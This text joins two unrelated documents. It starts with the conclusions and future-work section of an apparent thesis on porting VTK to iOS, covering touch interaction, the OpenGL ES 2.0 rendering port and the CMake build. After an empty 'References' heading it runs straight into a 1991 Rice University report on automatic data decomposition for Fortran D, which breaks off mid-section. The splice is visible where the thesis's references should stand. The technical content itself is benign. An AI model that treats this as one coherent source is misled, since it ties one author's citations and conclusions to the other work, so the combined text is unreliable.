VTK has a couple of abstract classes that handle interaction and events, mainly vtkRenderWindowInteractor, vtkInteractorStyle and vtkInteractorObserver. VtkRenderWindowInteractor provides a platform-independent interaction mechanism for mouse, key and timer events. It is a base class for platform-dependent implementations.
A subclass of vtkRenderWindowInteractor listens for platform events, then translates and routes the event messages to vtkInteractorStyle. VtkInteractorObserver is an abstract superclass for subclasses that observe events invoked by vtkRenderWindowInteractor. VtkInteractorStyle is a subclass of vtkInteractorObserver. VtkRenderWindowInteractor forwards events to vtkInteractorStyle, which provides an event-driven approach to the rendering window.

Interaction in iOS

Event handling in iOS [26] is available in the UIKit library. To handle multi-touch events, a subclass of a responder class must be created, which can be a subclass of UIView. To receive and handle multi-touch events, one or several of the following methods must be implemented in the view's controller:

```objc
- (void)touchesBegan:(NSSet *)touches withEvent:(UIEvent *)event;
- (void)touchesMoved:(NSSet *)touches withEvent:(UIEvent *)event;
- (void)touchesEnded:(NSSet *)touches withEvent:(UIEvent *)event;
- (void)touchesCancelled:(NSSet *)touches withEvent:(UIEvent *)event;
```

The events are handled by evaluating the properties of the set of touches and proceeding accordingly. There is also the possibility of using gesture recognizers, which simplify the handling of gestures. In that case, one attaches instances of UIGestureRecognizer subclasses to a view; instead of receiving raw touch events, one receives the gesture events that are commonly used in iOS. Gestures that can be recognized are tapping, pinching in and out (for zooming), panning or dragging, swiping, rotating and long press. Gesture recognizers are attached to a view and deliver touch objects to the view after a gesture has been recognized. When a gesture or touch event has been received, it is up to the programmer to transform the graphics accordingly. iOS supports additional events, such as shaking the device and GPS events. These events are delivered similarly to touch events.
Short on iOS multitouch in VTK

Adding iOS multitouch support to VTK requires new implementations of vtkRenderWindowInteractor and vtkInteractorStyle. The role of the vtkRenderWindowInteractor subclass would be to intercept touch or gesture events from iOS and to handle timing events and the event thread in a platform-dependent manner. The events sent to vtkInteractorStyle must be extended to support platform-independent descriptions of touch events.

8 Conclusions

From the investigation and work done we can conclude that, thanks to its design, VTK can for the most part be modified and extended to run on the iPad. To add GLES 2.0 and iOS support in a way that makes sense, the CMake build process needs major refactoring, so that the user can download the VTK source and produce an Xcode project ready for iOS integration. Ideally, the GLES2 and iOS parts of VTK should be integrated into the VTK project and be developed alongside “standard” VTK. As discussed in chapter 5.1, the CMake build files require modifications to handle new platforms. The CMakeLists.txt file for each target needs new macros defining GLES- and iOS-specific building options to add the correct files to the target during the build step. We also need to configure CMake to link the targets to the required iOS libraries and to set iOS-compatible build options.

The issues encountered while trying to compile and run VTK, described in chapter 6 “Compiling and Running VTK on iOS”, must be addressed. One issue was the generation of required OpenGL extension files, which simply is incompatible with GLES 2.0. A proposed solution is to generate VTK extension files for each supported hardware platform, package the files with the build, and use CMake to link the correct file to the build depending on the configuration. Another issue is the generation of material files.
This can also be resolved by removing the command line tool that is executed before compilation and creating a library of material files that are included in the build. Parts of the vtkIO target and dependent targets could not be compiled due to missing libraries for iOS. Although this is a small, delimited part with no effect on this work, further investigation is needed to determine what can and cannot be supported. This concerns support for video encoding and decoding, compression, and database interfacing.

The largest part of making VTK iOS compatible is of course the OpenGL rendering implementation, which requires a lot of additional work. While spending a lot of time looking at the rendering implementation of VTK and studying the VTK frameworks, it was concluded that the fixed function pipeline of OpenGL is widely used, with no trivial way of porting the OpenGL code to GLES 2.0. However, GLES 2.0 is defined as a subset of OpenGL 2, which entails that a lot of compatible code can be reused, while use of the unsupported fixed function pipeline has to be replaced by shaders using the material framework provided by VTK, described in chapter 7.3 “Porting OpenGL to OpenGL ES 2.0”.

Providing iOS-specific window handling is relatively problem-free since the VTK framework is created for cross-platform support. New iOS implementations of vtkRenderWindow and vtkRenderer are needed to interface with the UIWindow and UIView APIs of iOS.

Interaction in iOS differs a great deal from mouse interaction. VTK provides us with an interaction framework where a vtkRenderWindowInteractor is attached to a vtkRenderWindow to enable manipulation of the scene. The framework offers an abstract way of handling interactions and makes almost no assumptions regarding the underlying physical form of interaction. New interaction implementations can be added by inheriting from the classes described in 7.4 “Interaction”.
The iOS SDK supplies comprehensive support for event handling and gesture recognition, which helps in implementing multitouch support for iOS. A desirable approach might be to create an abstract multitouch interaction layer on top of VTK's current interaction framework to facilitate a common way for different devices to implement their own multitouch logic.

8.1 Why not OpenGL ES 1.1?

One could ask why GLES 1.1 was not investigated instead of GLES 2.0, since GLES 1.1 supports the fixed function pipeline. The main issue with GLES 1.1 is that it does not support a programmable pipeline. Since rendering in VTK is based on OpenGL 2 and shaders are supported in VTK, using GLES 1.1 would remove support for shaders and materials in VTK. Another concern is the fact that OpenGL is moving in the direction of removing the fixed function pipeline in favor of shaders. In GLES 2.0 the fixed function pipeline is not supported, which is also the case for OpenGL 3.1 and newer versions.

8.2 Future work

A substantial amount of work remains to get a working prototype of VTK running on iOS. Below is a summary of the work left to be done for VTK to be fully iOS compatible, some of which is investigated in this work and some of which is not.

- The CMake build process needs revision to be able to produce a working iOS project.
- The OpenGL rendering classes have to be re-implemented in GLES 2.0 and added to the build process.
- Any required files, such as XML materials and decoder tables, must be created and come packaged with the build, or alternatively be generated in a way that is compatible with iOS execution.
- Consideration must be given to how user interaction using touch and multitouch devices should be handled, and new implementing classes are needed.
- Scripting languages that wrap VTK, such as Tcl/Tk and Python, should be investigated to determine the possibility of iOS support.
- Higher level libraries which were not taken into consideration must be further investigated.
- Volume rendering in VTK will require additional GLES 2 re-implementations.
- The vtkWidget library needs revision, since not all widgets may be suitable for the platform.

References
Automatic Data Alignment and Distribution for Loosely Synchronous Problems in an Interactive Programming Environment

Ulrich Kremer
Ken Kennedy

CRPC-TR91205-S
April 1991

Center for Research on Parallel Computation
Rice University
6100 South Main Street, CRPC - MS 41
Houston, TX 77005

Ken Kennedy (ken@rice.edu)
Ulrich Kremer (kremer@rice.edu)

Department of Computer Science
Center for Research on Parallel Computation
Rice University
P.O. Box 1892
Houston, Texas 77251

Abstract

An approach to distributed memory parallel programming that has recently become popular is one where the programmer explicitly specifies the data layout using language extensions, and a compiler generates all the communication. While this frees the programmer from the tedium of thinking about message passing, no assistance is provided in determining the data layout scheme that gives satisfactory performance on the target machine. We wish to provide automatic data alignment and distribution techniques for a large class of scientific computations, known in the literature as loosely synchronous problems. We propose an interactive software tool that allows the user to select regions of the sequential input program and responds with a data decomposition scheme and diagnostic information for the selected region. The proposed tool allows the user to obtain insights into the characteristics of the program executing on a distributed memory machine and into the behavior of the underlying compilation system, without actually compiling and executing the program on the machine. An empirical study of actual application programs will show whether automatic techniques are able to generate data decomposition schemes that are close to optimal.
If automatic techniques fail to do so, we want to answer the questions (1) how user interaction can help to overcome the deficiencies of automatic techniques, and (2) whether, in particular, there is a data-parallel programming style that allows automatic detection of efficient data alignment and distribution schemes.

1 Introduction

Although distributed memory parallel computers are among the most cost-effective machines available, most scientists find them difficult to program. The reason is that traditional programming languages support single name spaces and, as a result, most programmers feel more comfortable working with a shared memory programming model. To this end, a number of researchers [CK88, CCL88, KMV90, PSvG91, RA90, RP89, RSW88, ZBG88, KZBG88, Ger89] have proposed using a traditional sequential or parallel shared-memory language extended with annotations specifying how the data is to be mapped onto the distributed memory machine. This approach is inspired by the observation that the most demanding intellectual step in rewriting programs for distributed memory is the data layout; the rest is straightforward but tedious and error-prone work. The Fortran D language and its compiler [FHK+90, HKT92b] follow this approach. Given a Fortran D program, the compiler mechanically generates the node program for a given distributed-memory target machine.

A problem with this approach is that it does not support the user in the decision process about a good data layout. We propose the development of automatic techniques for data alignment and distribution for regular loosely synchronous problems that deal with realignment/redistribution, data replication, procedure calls, and control flow. Loosely synchronous problems represent a large class of scientific computations [FJL+88]. They can be characterized by computation-intensive regions that have substantial parallelism, with a synchronization point between the regions.
We restrict our proposed system to regular loosely synchronous problems with arrays as their major data structures. In addition, we will allow regular problems that give rise to wavefront-style computations [Lam74]. We do not handle representations of data objects as they occur, for instance, in irregular problems like sparse matrix and unstructured mesh computations [SCMB90, WSHB91, KMV90].

We will investigate the feasibility of these new automatic techniques in the context of an interactive system. The proposed automatic data decomposition tool is part of the Fortran D programming environment, as shown in Figure 1. The automatic data partitioner may be applied to an entire program or to specific program fragments. When invoked on an entire program, it automatically selects data decompositions without further user interaction. The feasibility of the automatic system is determined by the ‘quality’ of the generated data decomposition schemes compared to schemes that are considered optimal. This quality measure has to be defined prior to our investigation in order to guarantee an unbiased discussion of the results gained by an empirical study of our techniques applied to real programs. If it turns out that automatic data decomposition is not feasible for some applications, we want to discuss why the automatic techniques failed and how user interaction can help to overcome their deficiencies. In particular, we want to investigate whether there is a data-parallel programming style for sequential programs that facilitates automatic data alignment and distribution. The existence of a usable programming style in the context of vectorization has been observed by some researchers [CKK89, Wol89] and is partially responsible for the success of automatic vectorization. We believe that for regular loosely synchronous problems written in a data-parallel programming style, the automatic data partitioner can determine an efficient decomposition scheme in most cases.
However, we do not believe that fully automatic techniques will be successful for ‘dusty deck’ programs.

After a short introduction to Fortran D, we motivate the need for automatic data decomposition. A discussion of our approach to automatic data alignment and distribution follows. The rest of the paper gives a description of the success/failure criterion for the proposed automatic techniques. An overview of related work, together with our research goals and contributions, concludes the paper.

2 Fortran D

The data decomposition problem can be approached by considering the two levels of parallelism in data-parallel applications. First, there is the question of how arrays should be \textit{aligned} with respect to one another, both within and across array dimensions. We call this the \textit{problem mapping} induced by the structure of the underlying computation. It represents the minimal requirements for reducing data movement for the program, and is largely independent of any machine considerations. The alignment of arrays in the program depends on the natural fine-grain parallelism defined by individual members of data arrays. Second, there is the question of how arrays should be \textit{distributed} onto the actual parallel machine. We call this the \textit{machine mapping} caused by translating the problem onto the finite resources of the machine. It is affected by the topology, communication mechanisms, size of local memory, and number of processors of the underlying machine. The distribution of arrays in the program depends on the coarse-grain parallelism defined by the physical parallel machine.

Fortran D is a version of Fortran that provides data decomposition specifications for these two levels of parallelism using \texttt{DECOMPOSITION}, \texttt{ALIGN}, and \texttt{DISTRIBUTE} statements. A decomposition is an abstract problem or index domain; it does not require any storage. Each element of a decomposition represents a unit of computation.
The \texttt{DECOMPOSITION} statement declares the name, dimensionality, and size of a decomposition for later use. The \texttt{ALIGN} statement is used to map arrays onto decompositions. Arrays mapped to the same decomposition are automatically aligned with each other. Alignment can take place either within or across dimensions. The alignment of arrays to decompositions is specified by placeholders in the subscript expressions of both the array and the decomposition. In the example below,

\begin{verbatim}
REAL X(N,N)
DECOMPOSITION A(N,N)
ALIGN X(I,J) with A(J-2,I+3)
\end{verbatim}

\(A\) is declared to be a two-dimensional decomposition of size \(N \times N\). Array \(X\) is then aligned with respect to \(A\) with the dimensions permuted and offsets within each dimension.

After arrays have been aligned with a decomposition, the \texttt{DISTRIBUTE} statement maps the decomposition to the finite resources of the physical machine. Distributions are specified by assigning an independent \textit{attribute} to each dimension of a decomposition. Predefined attributes are \texttt{BLOCK}, \texttt{CYCLIC}, and \texttt{BLOCK\_CYCLIC}. The symbol ``:'' marks dimensions that are not distributed. Choosing the distribution for a decomposition maps all arrays aligned with the decomposition to the machine. In the following example,

\begin{verbatim}
DECOMPOSITION A(N,N)
DISTRIBUTE A(:, BLOCK)
DISTRIBUTE A(CYCLIC,:)
\end{verbatim}

distributing decomposition \(A\) by \((:, \text{BLOCK})\) results in a column partition of arrays aligned with \(A\). Distributing \(A\) by \((\text{CYCLIC}, :)\) partitions the rows of \(A\) in a round-robin fashion among the processors. These sample data alignments and distributions are shown in Figure 2. We should note that our goal in designing Fortran D is not to support the most general data decompositions possible.
Instead, our intent is to provide decompositions that are both powerful enough to express data parallelism in scientific programs, and simple enough to permit the compiler to produce efficient programs. Fortran D is a language with semantics very similar to sequential Fortran. As a result, it should be quite usable by computational scientists. In addition, we believe that our two-phase strategy for specifying data decomposition is natural and conducive to writing modular and portable code. Fortran D bears similarities to both CM Fortran [TMC89] and KALI [KM91]. The complete language is described in detail elsewhere [FIK90].

3 Why is Finding a Good Data Layout Hard?

The choice of a good data decomposition scheme depends on many factors. All these factors make it extremely difficult for a human to predict the behavior of a given data decomposition scheme without having to compile and run the program on the specific target system. The effect of a given data decomposition scheme and program structure on the efficiency of the compiler-generated code running on a given target machine depends on:

1. *compiler characteristics*, such as the communication analysis algorithm and optimizing transformations used, and the set of communication primitives and routines that can be generated. For instance, fast collective communication routines, such as the Crystal router package developed at Caltech [FF88], are crucial for determining the profitability of realignment and redistribution. In addition, if the compiler generates a node program, the characteristics of the target machine's node compiler have to be considered.

2. *machine characteristics*, such as communication and computation costs, and machine topology. For example, the specification of a three-dimensional grid partition might be efficient on a machine with a three-dimensional topology, assuming the predominance of nearest-neighbor communication.
On a machine with a one-dimensional ring topology, the same specification leads to less efficient communication because messages must be sent to distant nodes on the ring, creating the potential for collisions.

\begin{verbatim}
 1 DOUBLE PRECISION v(N,N), a, b
 2 DECOMPOSITION d(N,N)
 3 ALIGN v(I,J) WITH d(I,J)
 4 DISTRIBUTE d(BLOCK,BLOCK)
 5 DO k = 1, M
 6   // Compute the red points
 7   DO j = 1, N, 2
 8     DO i = 1, N, 2
 9       v(i,j) = a*(v(i,j-1) + v(i-1,j) + v(i,j+1) + v(i+1,j)) + b*v(i,j)
10     ENDDO
11   ENDDO
12   DO j = 2, N, 2
13     DO i = 2, N, 2
14       v(i,j) = a*(v(i,j-1) + v(i-1,j) + v(i,j+1) + v(i+1,j)) + b*v(i,j)
15     ENDDO
16   ENDDO
17   // Compute the black points
18   DO j = 1, N, 2
19     DO i = 2, N, 2
20       v(i,j) = a*(v(i,j-1) + v(i-1,j) + v(i,j+1) + v(i+1,j)) + b*v(i,j)
21     ENDDO
22   ENDDO
23   DO j = 2, N, 2
24     DO i = 1, N, 2
25       v(i,j) = a*(v(i,j-1) + v(i-1,j) + v(i,j+1) + v(i+1,j)) + b*v(i,j)
26     ENDDO
27   ENDDO
28 ENDDO
\end{verbatim}

Figure 3: Fortran D code with BLOCK distribution, DOUBLE PRECISION

3. *problem characteristics*, such as the actual problem size and the number of processors to be used. The ratio between local computation and necessary communication can determine the efficiency of a data decomposition scheme. For some programs, problem characteristics are not needed to generate good data decomposition schemes. For such programs, recompilation for different problem sizes and numbers of processors can be avoided.

In the remainder of this section, we will examine the relationship between the listed factors using the characteristics of the Fortran D compiler [HKT92b, HKT91, HHK91]. Figure 3 shows Fortran D code for pointwise red-black relaxation using a block-partitioning scheme for the N x N, double precision array v. Substituting line 4 by DISTRIBUTE d(:,BLOCK) specifies a column-partitioning scheme for array v. To execute a program on a distributed memory machine, the program's data and code have to be mapped into the local memories of the machine's processors.
The Fortran D compiler generates a node program according to the single program, multiple data (SPMD) programming model [Kar87], exploiting the data parallelism inherent in the program, as opposed to its functional parallelism. Each processor executes only those program statement instances that define a value of a data item that has been mapped onto that processor by the decomposition, alignment and distribution specifications. Data items that are mapped onto a processor are said to be *owned* by that processor. Execution of such a statement may require non-local data, i.e., data that is owned by another processor. Such non-local data items must be obtained by communication.

For the given example we assume that the Fortran D compiler performs the following communication optimizations. *Message vectorization* uses the results of data dependence analysis [AK87, KKP+81] to combine element messages into vectors. The level of the deepest loop-carried true dependence, or the loop enclosing a loop-independent true dependence, determines the outermost loop where element messages resulting from the same array reference may legally be combined [BFKK90, Ger90]. *Message coalescing* ensures that each data value is sent to a processor only once. A detailed description of different communication optimizations can be found in [HKT92a]. This paper also discusses an alternative approach to generating messages for the red-black example, called *vector message pipelining*.

Using message vectorization, the Fortran D compiler generates communication statements before the first loop nest at line 7 and after the second loop nest, between lines 17 and 19. Our hypothetical, simplified version of the Fortran D compiler inserts code to communicate all boundary points, although only black or red points need to be communicated before the first and third loop, respectively. Figure 4 illustrates the resulting compute-communicate sequence for the block-partitioning and column-partitioning schemes.
We assume in our example that the compiler generates an EXPRESS¹ node program [EXP89] where communication is performed by calls to the vector-send and vector-receive communication routines **KXVWR1** and **KXVREA**, respectively. Execution of **KXVWR1** is non-blocking in the sense that the sending processor does not wait until the message is received. Execution of **KXVREA** is blocking, i.e. the processor has to wait until it receives the message. Alternatively, the compiler could have chosen to insert calls to the communication routines **KXVCHA** that implement communication using a handshaking protocol.

¹EXPRESS is a copyright of ParaSoft Corporation.

Figure 5 and Figure 6 show the actual execution times of one iteration of the outermost timestep loop (line 5 in Figure 4) for increasing sizes of array \( \mathbf{v} \) using the column-partitioning and block-partitioning schemes. Figure 5 shows the execution times on the Ncube-1 for 16 and 64 processors, where \( \mathbf{v} \) is a single precision floating point array. Figure 6 contains the results on 16 processors on the iPSC/860 for a single precision and a double precision array \( \mathbf{v} \). The figures show the tradeoffs between the column-partitioning and block-partitioning schemes for a compiler-generated node program. The tradeoffs depend on the actual problem size, i.e. the element size and overall size of the array \( \mathbf{v} \), the specific target machine, and the actual number of processors used on the target machine.

What we need is a programming environment that helps the user understand the effect of a given data decomposition and program structure on the efficiency of the compiler-generated code at the Fortran D language level. The Fortran D programming system, shown in Figure 1, provides such an environment. The main components of the environment are a static performance estimator and an automatic data partitioner. In this paper we will mainly discuss the automatic data partitioner.
4 Automatic Data Decomposition

The key ideas and assumptions behind automatic data decomposition are:

1. reasonably simple static models can be used to estimate the performance of a compiler-generated node program with explicit communication;

2. the behavior of the Fortran D compiler on a specified program segment, such as a loop or the entire program, can be anticipated efficiently, i.e. without actually compiling the whole program;

3. if we restrict ourselves to fairly simple decomposition schemes, then for a program segment there are only a small number of such decompositions suitable for each array, and hence these decompositions can be exhaustively examined by an automatic system; and

4. the automatic data decomposition for the entire program can be done by successively decomposing the data for smaller program segments, with realignment/redistribution between the segments when necessary.

We believe that these assumptions are true for loosely synchronous problems written in a data-parallel programming style. In the following we will discuss some of the issues involved in the above key ideas and assumptions.

4.1 Static Performance Estimation

It is clearly impractical to use dynamic performance information to choose between data decompositions in our programming environment. Instead, a static performance estimator is needed that can accurately predict the performance of a Fortran D program on the target machine. The performance estimator is not based on a general theoretical model of distributed-memory computers. Instead, it employs the notion of a training set of kernel routines that measures the cost of various computation and communication patterns on the target machine. The results of executing the training set on a parallel machine are summarized and used to train the performance estimator for that machine.
Figure 5: Measured times on Ncube-1: FLOAT operations on 16 and 64 processors

Figure 6: Measured times on iPSC/860: DOUBLE PRECISION and FLOAT operations on 16 processors

By utilizing training sets, the performance estimator achieves both accuracy and portability across different machine architectures. The resulting information may also be used by the Fortran D compiler to guide communication optimizations. The static performance estimator is divided into two parts, a machine module and a compiler module. The compiler module predicts the performance at the Fortran D language level, while the machine module estimates the performance at a level where the decomposition scheme is already 'hardcoded' into the program, i.e. at the node program level containing explicit communications.

4.1.1 Machine Module

The machine module predicts the performance of node programs with explicit communications. It uses a machine-level training set written in message-passing Fortran. The training set contains individual computation and communication patterns that are timed on the target machine for different numbers of processors and data sizes. To estimate the performance of a node program, the machine module can simply look up the results for each computation and communication pattern encountered. Note that, to assist automatic data decomposition, the static performance estimator does not need to predict the absolute performance of a given data decomposition, even though that would be desirable. Instead, it only needs to accurately predict the performance relative to other data decompositions. In many cases the accurate prediction of the crossover point at which one data decomposition scheme becomes preferable over another will be sufficient. A prototype of the machine module has been implemented for a common class of loosely synchronous scientific problems [FJL+88].
It predicts the performance of a node program using EXPRESS communication routines for different numbers of processors and data sizes [EXP89]. The prototype performance estimator has proved quite precise, especially in predicting the relative performances of different data decompositions [BFKK91]. Figure 7 and Figure 8 show the estimated execution times for our red-black example using the training set approach. The crossover points and execution times induced by the different decomposition schemes are predicted with high accuracy. 4.1.2 Compiler Module The compiler module forms the second part of the static performance estimator. It assists the user in selecting data decompositions by statically predicting the performance of a program for a set of data decompositions. The compiler module employs a compiler-level training set written in Fortran D that consists of program kernels such as stencil computations and matrix multiplication. The training set is converted into message-passing Fortran using the Fortran D compiler and executed on the target machine for different data decompositions, numbers of processors, and array sizes. Estimating the performance of a Fortran D program then requires matching computations in the program with kernels from the training set. The compiler-level training set also provides a natural way to respond to changes in the Fortran D compiler as well as the machine. We simply recompile the training set with the new compiler and execute the resulting programs to reinitialize the compiler module for the performance estimator. Since it is not possible to incorporate all possible computation patterns in the compiler-level training set, the performance estimator will encounter code fragments that cannot be matched with existing kernels. To estimate the performance of these codes, the compiler module must rely on the machine-level training set. 
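Crossover-point prediction can be illustrated with a toy cost model. Everything below is invented for illustration (the two decomposition shapes, the cost coefficients, and the message startup cost of 50 units); the actual estimator looks costs up in the training set rather than evaluating closed-form formulas.

```python
# Toy cost models for two decompositions of an n-by-n stencil on p processors.

def cost_row_block(n, p):
    # (BLOCK,*): computation n*n/p, plus exchanging two n-element boundary rows
    return (n * n) / p + 2.0 * n

def cost_block_block(n, p):
    # (BLOCK,BLOCK): same computation, four boundary messages of n/sqrt(p)
    # elements each, plus four fixed message startups (50 units, invented)
    return (n * n) / p + 4.0 * (n / p ** 0.5) + 4.0 * 50.0

def crossover(n, max_p=1024):
    """Smallest processor count at which (BLOCK,BLOCK) is estimated cheaper,
    or None if it never wins within the searched range."""
    for p in range(1, max_p + 1):
        if cost_block_block(n, p) < cost_row_block(n, p):
            return p
    return None
```

Under these made-up coefficients the two-dimensional distribution only pays off once enough processors amortize its extra message startups, which is exactly the kind of crossover the estimator must rank correctly even if its absolute timings are off.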
We plan to incorporate elements of the Fortran D compiler in the performance estimator so that it can mimic the compilation process. The compiler module can thus convert any unrecognized Fortran D program fragment into an equivalent node program, and invoke the machine module to estimate its performance.

Figure 7: Estimated times on Ncube-1: FLOAT operations on 16 and 64 processors
Figure 8: Estimated times on iPSC/860: DOUBLE PRECISION and FLOAT operations on 16 processors

4.2 Data Alignment and Data Distribution

The analysis performed by the automatic data partitioner divides the program into separate computation phases. A phase consists of a group of statements that are mutually involved in a computation and therefore should be mapped onto the same Fortran D decomposition using ALIGN statements. In the absence of procedure calls we define a phase as follows: a phase is a loop nest such that, for each induction variable that occurs in a subscript position of an array reference in the loop body, the phase contains the surrounding loop that defines that induction variable. A phase is minimal in the sense that it does not include surrounding loops that do not define induction variables occurring in subscript positions. The maximal size and number of dimensions of the arrays referenced in the phase define the dimensionality and size of its associated Fortran D decomposition. For example, the red-black program in Figure 4 has four phases enclosed in the outer k-loop. Each phase has an associated Fortran D decomposition of dimensionality and size equal to those of the array v.

4.2.1 Intra-phase Alignment and Distribution

The intra-phase decomposition problem consists of determining a set of good data decompositions and their performance for each individual phase. The data partitioner first tries to match the phase or parts of the phase with computation patterns in the compiler training set.
If a match is found, it returns the set of decompositions with the best measured performance as recorded in the compiler training set. If no match is found, the data partitioner must perform alignment and distribution analysis on the phase. The resulting solution may be less accurate, since the effects of the Fortran D compiler and target machine can only be estimated.

Alignment analysis is used to prune the search space of possible array alignments by selecting only those alignments that minimize data movement. Alignment analysis is largely machine-independent; it is performed by analyzing the array access patterns of computations in the phase. We intend to build on the inter-dimensional and intra-dimensional alignment techniques of Li and Chen [LC90a] and Knobe et al. [KLS90]. The alignment problem can be formulated as an optimization problem on an undirected, weighted graph. Some instances of the alignment problem have been shown to be NP-complete [LC90a]. One major challenge in our proposed work will be to define the appropriate weights of the graph and to come up with a heuristic that solves the alignment problem in a way that is suitable for loosely synchronous problems. Alignment analysis is, however, compiler dependent: a compiler may recognize arrays that are used only as temporaries and can therefore be allocated locally in each processor without inducing any communication. These local or private arrays are not considered during the alignment analysis.

Distribution analysis follows alignment analysis. It applies heuristics to prune unprofitable choices in the search space of possible distributions. Distribution analysis is compiler, machine, and problem dependent. For instance, the compiler may not be able to generate efficient wavefront computations [Lam74] for a subset of distributions. Transformations like loop interchange and strip-mining can substantially improve the degree of parallelism induced by the wavefront [HKT91].
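Before continuing with distribution analysis, the inter-dimensional alignment idea above can be illustrated with a toy heuristic. The code below is an invented sketch, not the Li and Chen algorithm: it merely counts, over paired array references, how often two dimensions carry the same induction variable, and then greedily matches the heaviest dimension pairs.

```python
# Toy inter-dimensional alignment: references are tuples of subscript
# variables, e.g. A(i,j) -> ('i', 'j'); refs_a[s] and refs_b[s] come from
# the same statement s.
from collections import Counter

def alignment_weights(refs_a, refs_b):
    """w[(da, db)] = number of statements in which dimension da of A and
    dimension db of B are indexed by the same induction variable."""
    w = Counter()
    for sa, sb in zip(refs_a, refs_b):
        for da, va in enumerate(sa):
            for db, vb in enumerate(sb):
                if va == vb:
                    w[(da, db)] += 1
    return w

def greedy_alignment(refs_a, refs_b):
    """Greedy heuristic: repeatedly pick the heaviest unused dimension pair,
    so dimensions that most often share a subscript end up aligned."""
    w = alignment_weights(refs_a, refs_b)
    used_a, used_b, align = set(), set(), {}
    for (da, db), _ in w.most_common():
        if da not in used_a and db not in used_b:
            align[da] = db
            used_a.add(da)
            used_b.add(db)
    return align
```

For references like A(i,j) paired with B(j,i), the heuristic aligns dimension 0 of A with dimension 1 of B, i.e. it discovers the transposed alignment that avoids data movement.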
Distributions that sequentialize the computation are eliminated. Another consideration in our pruning heuristic is the size of the dimensions of the decomposition: if the size of a dimension is smaller than a machine-dependent threshold, the dimension will always be localized. This eliminates all distributions that map small dimensions to distinct processors. We will also restrict the possible block sizes in BLOCK CYCLIC distributions to a reasonable subset of values. After the automatic data partitioner has determined a set of reasonable data decomposition schemes, the static performance estimator is invoked to predict the performance of each reasonable scheme.

4.2.2 Inter-phase Alignment and Distribution

After computing data decomposition schemes for each phase, the automatic data partitioner must solve the inter-phase decomposition problem of merging the individual data decompositions. It considers realignment and redistribution of arrays between computational phases to reduce communication costs or to improve the available parallelism. The merging problem can be formulated as a single-source shortest paths problem over the phase control flow graph. The phase control flow graph is similar to the control flow graph [ASU86], except that all nodes associated with a phase are substituted by nodes representing the set of reasonable data decomposition schemes for the phase. The static performance estimator is used to predict the costs of these reasonable decomposition schemes. The availability of fast collective communication routines will be crucial for the profitability of realignment and redistribution. The merging problem for a linear phase control flow graph can be solved as a single-source shortest paths problem in a directed acyclic graph [CLR90]. For example, Figure 9 shows a three-phase problem with four reasonable decompositions for each phase. Each decomposition scheme is represented by a node.
The node is labeled with the predicted cost of the decomposition scheme for the phase. Edges between phases are labeled with the realignment and redistribution costs for the source and sink decomposition schemes. For each of the four decompositions of the first phase we solve the single-source shortest paths problem. In general, let k denote the maximal number of decomposition schemes for each phase and p the number of phases. The resulting time complexity is O(p × k³).

The merging of phases in a strongly connected component of the phase control flow graph should be done before merging any of its phases with a phase outside of the strongly connected component. This suggests a hierarchical algorithm for merging phases based on, for example, Tarjan intervals [Tar74]. Assuming that the innermost loop bodies can be represented by a linear phase control flow subgraph, the merging problem is solved by adding a shadow copy of the first phase after the last phase in the linear subgraph, keeping the subgraph acyclic. After solving the single-source shortest paths problem, the subgraph is collapsed into a single interval summary phase representing the different costs of entering the interval with one decomposition scheme and exiting it with a possibly different scheme. An example interval summary phase is shown in Figure 10. In the resulting phase control flow graph we again identify the innermost loops and repeat the process of collapsing and summarizing until the phase control flow graph consists of a single node.

In fully automatic mode, the data partitioner selects the decomposition scheme that has the minimal cost for the shortest path from a decomposition in the first phase to a decomposition in the last phase of the selected program segment. Following the selected shortest path, ALIGN and DISTRIBUTE statements are inserted wherever the decomposition at the source of an edge differs from the decomposition at the sink.
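On a linear phase control flow graph, the shortest-path merge can be sketched as a small dynamic program. This is an illustrative Python sketch, not the ParaScope implementation: schemes are numbered 0..k-1, all costs are plain numbers, and a single forward pass handles all start decompositions of the first phase at once.

```python
# Merge phases over a linear phase control flow graph by dynamic programming.

def merge_phases(phase_costs, edge_costs):
    """phase_costs[i][d]   : estimated cost of running phase i with scheme d
       edge_costs[i][d][e] : realignment/redistribution cost of going from
                             scheme d after phase i to scheme e in phase i+1
       Returns (total cost, chosen scheme per phase) for the cheapest path."""
    p, k = len(phase_costs), len(phase_costs[0])
    best = list(phase_costs[0])   # best[d] = cheapest way to finish phase 0 in d
    back = []                     # backpointers for path reconstruction
    for i in range(1, p):
        new_best, choices = [], []
        for e in range(k):
            costs = [best[d] + edge_costs[i - 1][d][e] for d in range(k)]
            d_min = min(range(k), key=costs.__getitem__)
            new_best.append(costs[d_min] + phase_costs[i][e])
            choices.append(d_min)
        back.append(choices)
        best = new_best
    # follow backpointers from the cheapest final scheme
    d = min(range(k), key=best.__getitem__)
    path = [d]
    for choices in reversed(back):
        d = choices[d]
        path.append(d)
    return min(best), path[::-1]
```

With two phases whose cheap schemes differ, the cheapest plan pays one redistribution between the phases rather than running either phase with a bad scheme, which is precisely the trade-off the edge labels encode.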
DECOMPOSITION specifications are declared at the beginning of the subroutine containing the selected program segment.

4.2.3 The Algorithm

Figure 11 gives the basic algorithm for automatic data decomposition for a program segment without procedure calls. The algorithm does not handle control flow other than loops and does not consider data replication.

Algorithm DECOMP
Input: program segment without procedure calls; problem sizes and number of processors to be used.
Output: data decomposition schemes for data objects referenced in the input program segment, with diagnostic information.

determine program phases of input program segment;
build phase control flow graph;
for each phase do
    perform alignment analysis;
    perform distribution analysis;
    generate diagnostic information, if available;
endfor
while phase control flow graph contains a loop do
    identify innermost loop (e.g., using Tarjan intervals);
    solve single-source shortest paths problem for this loop;
    identify realignment and redistribution points;
    generate diagnostic information, if available;
    substitute loop by its interval summary phase in the phase control flow graph;
endwhile
use the computed shortest path to generate DECOMPOSITION, ALIGN, and DISTRIBUTE statements, if in fully automatic mode;

Figure 11: Basic Algorithm for Automatic Data Alignment and Distribution

4.2.4 Automatic Decomposition in the Presence of Procedure Calls

One of the major challenges of the proposed research on automatic data decomposition is to devise techniques that can deal with procedure calls. Interprocedural analysis is used to allow the merging of computation phases across procedure boundaries. Interprocedural phase merging is compiler dependent. In particular, the automatic data partitioner has to know whether and when the compiler performs interprocedural optimizations such as procedure cloning [CHK92, HHKT91] or procedure inlining [Hal91]. In the following we will assume that the compiler performs procedure cloning for every distinct pattern of entry and exit decomposition schemes. We will only consider programs with acyclic call graphs.

